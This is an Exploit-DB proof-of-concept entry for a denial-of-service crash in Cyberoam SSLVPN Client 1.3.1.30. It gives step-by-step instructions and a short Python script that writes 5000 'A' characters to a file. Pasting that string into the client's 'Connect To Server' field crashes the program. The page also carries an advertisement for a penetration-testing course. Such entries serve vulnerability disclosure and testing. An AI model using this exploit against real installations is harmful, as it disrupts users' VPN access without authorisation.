Cyberoam SSLVPN Client 1.3.1.30 - 'Connect To Server' Denial of Service (PoC)

EDB-ID:

46923

CVE:

N/A




Platform:

Windows

Date:

2019-05-24


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux , the course required to become an Offensive Security Certified Professional (OSCP)

GET CERTIFIED

#Exploit Title: Cyberoam SSLVPN Client 1.3.1.30 - 'Connect To Server' Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2019-05-23
#Vendor Homepage: https://www.cyberoam.com
#Software Link: https://download.cyberoam.com/solution/optionals/i18n/CrSSL_v1.3.1.30.zip
#Tested Version: 1.3.1.30
#Tested on: Windows Windows 10 Single Language x64 / Windows 7 Service Pack 1 x64

#Steps to produce the crash:
#1.- Run python code: c_sslvpn_cts.py
#2.- Open c_sslvpn_cts.txt and copy content to clipboard
#3.- Open Cyberoam SSLVPN Client
#4.- Select Server Settings 
#5.- In "Connect To Server" field paste Clipboard
#6.- In "Port" type 80
#7.- Select "OK"
#8.- Crashed! 

cod = "\x41" * 5000

f = open('c_sslvpn_cts.txt', 'w')
f.write(cod)
f.close()